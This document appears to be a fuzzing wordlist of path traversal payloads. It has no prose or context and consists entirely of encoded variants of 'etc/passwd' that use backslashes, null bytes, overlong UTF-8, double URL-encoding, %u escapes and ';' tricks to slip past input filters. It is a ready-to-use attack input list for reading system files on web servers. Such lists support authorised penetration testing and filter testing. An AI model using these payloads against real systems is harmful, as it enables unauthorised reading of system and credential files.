etc\passwd
etc\\passwd
etc\\\passwd
etc\/passwd
etc0x5cpasswd
etc0x2fpasswd
etc/passwd;index.html
etc/passwd%FFindex.html
etc/passwd%FF.jpg
etc/passwd%FF
etc/passwd%20index.html
etc/passwd%20.jpg
etc/passwd%20
etc/passwd%0Dindex.html
etc/passwd%0D.jpg
etc/passwd%0D
etc/passwd%09index.html
etc/passwd%09.jpg
etc/passwd%09
etc/passwd%00index.html
etc/passwd%00.jpg
etc/passwd%00
etc/passwd
etc//passwd
etc///passwd
etc%uF025passwd
etc%uEFC8passwd
etc%u2216passwd
etc%u2215passwd
etc%e0%80%afpasswd
etc%c1%9cpasswd
etc%c0%afpasswd
etc%c0%80%5cpasswd
etc%c0%5cpasswd
etc%c0%2fpasswd
etc%5cpasswd
etc%2fpasswd
etc%25c1%259cpasswd
etc%25c0%25afpasswd
etc%255cpasswd
etc%252fpasswd
etc%%35%63passwd
etc%%32%66passwd
\etc/passwd
/etc/passwd
/..;/etc/passwd
.//etc/passwd
..;/etc/passwd
